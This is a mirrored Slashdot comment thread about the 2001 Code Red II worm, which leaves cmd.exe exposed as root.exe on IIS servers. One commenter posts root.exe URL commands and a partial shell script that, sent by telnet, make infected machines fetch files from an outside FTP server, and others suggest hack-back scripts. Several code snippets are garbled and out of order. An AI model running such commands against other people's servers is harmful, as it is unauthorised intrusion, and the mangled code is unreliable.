Slashdot Mirror
Code Red II: Shells for the Taking
sigurdur writes "It seems there is a new and more malicious version of Code Red out there. This one seems to try and copy cmd.exe into a position where it is accesible to us all - the scripts directory. So far I have seen it reported on the intrusions-list at incidents.org where they also just put up a notice about this third generation Code Red worm." I still think sircam is more annoying since it affects every email user, and not primarily poorly administered websites. But imagine how much bandwidth Code Red and Sircam have wasted in the last few weeks?
How about if somebody writes a default.ida script which sends the attacking server a GET /default.ida which makes the server go to miscrosoft.com, download and install the patch, and reboot itself? That'd be neat.
...
I'm surprised that Microsoft has escaped a huge class-action lawsuit for all the damage their products have piled upon their users and non-microsoft users. Its about time that somebody takes this on. I live in a Unix world but I'm tired of all the problems Gates and co. cause me.
Anyways, if cable modem users are seeing drastically increased ARPing, the targeting of the Code Red III variant should explain it -- hitting non-existent addresses on your subnet will cause the CMTSheadend router to ARP out to see who's got that address, you get the picture.
At the very least, it's a good opportunity for users to see how many modems your provider has packed onto your segment. If they've packed too many on there, you can be sure the CMTS router's going to get seriously bogged down.
I have an automated program which sends the IP addresses to the ARIS list *and* to my ISP's security department (those IP's which fall under their management) -- I wonder if ISP's are considering just dropping all packets from infected hosts, so when the customer comes to them and complains, they say "Oh, you're infected, reboot, install the patch, and we'll reconnect you." Seems that this would reduce the load on the CMTS and would be faster than trying to track down each customer individually.
Chad Loder
Rapid 7, Inc. - Next generation security products and services
http://www.rapid7.com
You can't sue MS (they are bigger then the govt prectically). But you can probably sue and company which uses IIS and stores your personal data. If that comapny was using IIS and they failed to patch their system then they have been criminally negligent in their duties. A few suits and all companies will drop IIS like a hot potato.
Everybody wins.
War is necrophilia.
There's been an IIS patch available for several months which blocks the hole exploited by CodeRed. You can't sue M$ for negligence but you might be able to sue any of the web server owners who haven't applied the patch.
Actually, there has been a beneficial effect with CodeRed (in the UK at least). I have seen several reports on British network news programmes that talk about "security flaws in M$ software", not "security flaws in the Internet". It's quite a step forward for the media here not to treat M$ software and Internet / PC software as being effectively synonymous. There is a faint but real message that the problem is Microsoft.
All I want is a secure system where it's easy to do anything I want. Is that too much to ask ~~ Randall Munroe
(Copied from the other thread, for those who are working on a way to fix this worm)
/pub/cr
/scripts/root.exe?+%2fc+echo+bin+%3etmpfile | telnet $1 80
/scripts/root.exe?+%2fc+echo+get+$DIR%2f$2+%3e%3et mpfile | telnet $1 80
/scripts/root.exe?+%2fc+echo+ftp+%2dA+%2ds%3atmpfi le+$FTP+%3edlfile%2ecmd | telnet $1 80
/scripts/root.exe?+/k+dlfile%2ecmd | telnet $1 80
:)
I played around for a few hours with this, trying to make a ghetto script that would fix the servers. There's no way for me to be sure my other stuff works, but the thing I did get working was a script to download files to the infected server from an ftp site.
#!/bin/sh
# Code Red ][ Download File script
# Usage: dlfile.sh infectedIP filename
#
# Please set the $ftp and $dir values to
# the ftp and directory of the patch and shutdown repository
# For ftp.youhavesetup.com
FTP="ftp%2eyouhavesetup%2ecom"
# Directory
DIR="%2fpub%2fcr"
echo GET
sleep 1
echo GET
sleep 1
echo GET
# Note that slashcode inserts a space in the string 'tmpfile' on both these lines, remove before running
sleep 1
echo GET
I tried setting it up and got the servers to download the patches, but I can't be sure that they are actually run. (I don't have an infected machine to test.) Also, I was unable to figure out a way to get the machines to reboot or restart IIS. It appears root.exe has limited permission in what it can do (as another poster or two stated.) There might be hacks that will do what I want to, but I'm too tired to mess with this anymore
--
From small ISP bosses to world leaders and FBI agents:
CNN story about Ukraine President getting SirCam.
Newsbytes story about FBI agent w/SirCam.
-pB
And even the clueless ones who continue to use inherently defective software such as Outlook and IIS have as much right to sue MS as people who smoked for 50 years have to sue tobacco firms...
That is probably illegal, and certainly a bad idea (self reproducing code almost always causes problems even when you don't intend it to) but what I wonder is if you could get away with creating a CGI called default.ida that attempted to automatically connect back to the client, disinfect the machine, and install a patch. It is much less dangerous since it doesn't reproduce, and you could certainly make the argument that it was only done in retaliation to someone (unwittingly) attempting to infect your computer with a virus.
heheh! Not only is it a fine remote administration feature, but it's also pretty slick the way machines upgraded in this way advertise their new status to everyone with a webserver on port 80.
Geeky modern art T-shirts
Right now my NIC is flickering like mad, yet Windows 2000 does not show these as incoming or outgoing packets. What is going on?
I wanted to know would it be possible to make a similar virus for Linux using a Bash Shell.
If not, why not?
Does anyone else find it ironic that vunerabilities.org, a security scanning site, is listed in the top ten attackers on dshield.org? At least, it is listed as of 16:45 EDT.
OR, one group could patch all those infected hosts...or at least notify the admins.
I've got a full analysis of this at http://braddock.com/cr2.html
I was curious just how often RedCode attacks. Sure, looking through the apache log files is nice, but it just didn't give me the sense of urgency... the quick succession at which attacks take place. So, I whipped up a quick perl script to play a noise every time I was "attacked". Needless to say, it's getting kind of annoying, but it still is incredible:
/var/log/your-access.log | grep XXXXXXXXXXXXX | cut -d \" \" -f 1 | wc -l > attacks_b"); /dev/null");
#!/usr/bin/perl
while(1) {
system("cat
$returnval = system("diff attacks_a attacks_b >
if(0!=$returnval) {
system("cp -f attacks_b attacks_a");
system("play buzzer2.aiff &");
}
sleep(1);
}
char sig[120] = "\0"
To automatically notify webmasters of infected sites, if you have mod_perl/Apache, use this script:
h prerm
http://forum.swarthmore.edu/epigone/modperl/nehza
It identifies any attempt to access '/default.ida', looks up the MX records of the remote IP, and sends a notification to postmaster@. It is not a 'hack back', just a notification email.
Or you could setup default.ida as a perl script that telnets to the ip's 25 port and sends an email with the fact they have a box thats screwed.. like the guy did here.
I do something similar, except I pop up an IE window pointing to a page on a site I host explaining code red and how to fix it. I always get that CGI error, but my server logs report a hit from the infected host on my explanation page. So that error is perfectly normal - it's working.
-- Fester
"Freedom is the freedom to say that two plus two make four. If that is granted, all else follows."